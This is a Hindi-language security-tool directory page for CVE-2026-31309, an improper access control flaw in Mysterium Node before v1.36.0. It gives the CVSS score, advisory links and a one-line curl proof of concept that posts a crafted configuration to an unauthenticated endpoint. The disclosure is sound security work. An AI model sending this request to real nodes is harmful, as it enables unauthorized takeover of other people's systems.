Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31309 — अनुचित पहुंच नियंत्रण Mysterium Node में v1.36.0 से पहले | Kitploit
उपकरण/GitHubGitHub/sch8ill/cve-2026-31309
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

अनुचित पहुंच नियंत्रण Mysterium Node में v1.36.0 से पहले

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-31309: अनुचित अभिगम नियंत्रण Mysterium Node में v1.36.0 से पहले

Mysterium Node के /tequilapi/config/user एंडपॉइंट में v1.21.1-rc0 से v1.36.0 से पहले के संस्करणों में अनुचित प्राधिकरण एक अप्रमाणित हमलावर को नोड के कॉन्फ़िगरेशन को मनमाने ढंग से अधिलेखित करने और एक निर्मित POST अनुरोध के माध्यम से पूर्ण नोड अधिग्रहण प्राप्त करने की अनुमति देता है।

CVSS

स्कोर: 9.8 (गंभीर)

वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

root@kitploit:~
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

Till Schacht द्वारा खोजा गया।

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
टूल डाउनलोड करें